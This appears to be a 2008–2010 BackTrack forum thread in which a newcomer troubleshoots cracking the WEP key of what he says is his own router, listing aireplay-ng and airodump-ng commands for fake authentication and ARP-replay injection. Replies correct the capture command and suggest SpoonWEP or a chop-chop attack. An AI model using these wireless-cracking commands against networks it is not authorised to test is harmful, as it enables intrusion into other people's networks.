Results 1 to 6 of 6

Thread: Only 8 IV's in aireplay

  1. #1
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    15

    Default Only 8 IV's in aireplay

    Nomatter how many packets I inject into my own router, I just can't seem to get more than 8 IV's out of it with aireplay.
    It's a 3com router with a wep crypt. if that information helps.
    And i'm running it off my Acer aspire one. USB boot btw.

    Here are the commands i've used:

    Airmon-ng stop ath0

    Airmon-ng start wifi0

    Airodump-ng ath0

    aireplay-ng -1 0 -e pjusken -a [AP mac] -h [my mac] ath0

    Now I'm tild by aireplay that ath0 is on channel 3, and the AP is using 11.
    Then I change to channel 11

    airmon-ng stop ath0

    airmon-ng start wifi0 11

    aireplay-ng -1 0 -e pjusken -a [AP mac] -h [my mac] ath0

    aireplay says:

    18:18:20 Sending Authentication Request (open system) [ACK]
    18:18:20 Authentication successful
    18:18:20 Sending Association Request
    18:18:20 Association successful :-) (AID: 1)

    So I start injecting

    aireplay-ng -3 -b [AP mac] -h [my mac] ath0

    I let it run until it's got about 25000 ARP's.
    When I run aircrack i've only got 8 IV's. While aireplay is injecting airodump tells me the packets per second #/s only range from 1 to 10.
    What could the reason be?

    I'm reasonable new to BT, and Linux at all so i'm gonna need information easy too understand :P (posting in Newbie Area, d'uh). And pardon the spelling while i'm first at throwing excuses ^^
    - Farnell

  2. #2

    Default

    Are you using Back|Track 3?

    If so, and if all you want to do is crack your WEP (and not learn), you can use SpoonWEP which is pre-loaded on BT3. It's a very nice tool created by a member here. There is an updated version, which is even nicer, called SpoonWEP 2 as well.

    I understand if you're just trying to learn though. Other members should be able to assist you more than me.

  3. #3
    Senior Member DaKahuna's Avatar
    Join Date
    Jan 2010
    Posts
    103

    Default

    Your airodump command is wrong. You should run airodump-ng -c <channel number of AP> -w <capture filename> ath0

    The run aircrack-ng -0 -z <capture filename>

    If you run aircrack-ng without doing it against the capture file, you will only show 8 IV's.

  4. #4
    Member
    Join Date
    Jun 2008
    Posts
    101

    Default


    So I start injecting

    aireplay-ng -3 -b [AP mac] -h [my mac] ath0
    Only use the Standart ARP-Request Attack (-3) when there are active clients associated in the network. For environments without clients try the chop-chop approach instead!

  5. #5
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    15

    Default

    Thanks a lot everyone.
    I am currently using Backtrack 3. My intention was to learn linux so I think i'l stick to finding out whats wrong with the aircrack suite\me :P
    I'l get to trying out the commands when I get some spare time on my hands.

  6. #6
    Senior Member DaKahuna's Avatar
    Join Date
    Jan 2010
    Posts
    103

    Default

    If your intention was to "learn linux" then I am not sure how breaking your WEP key is a part of that. If your intention was to learn to use the aircrack-ng suite of tools then might I suggest you take a look at the WiFu course from Offensive Security.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •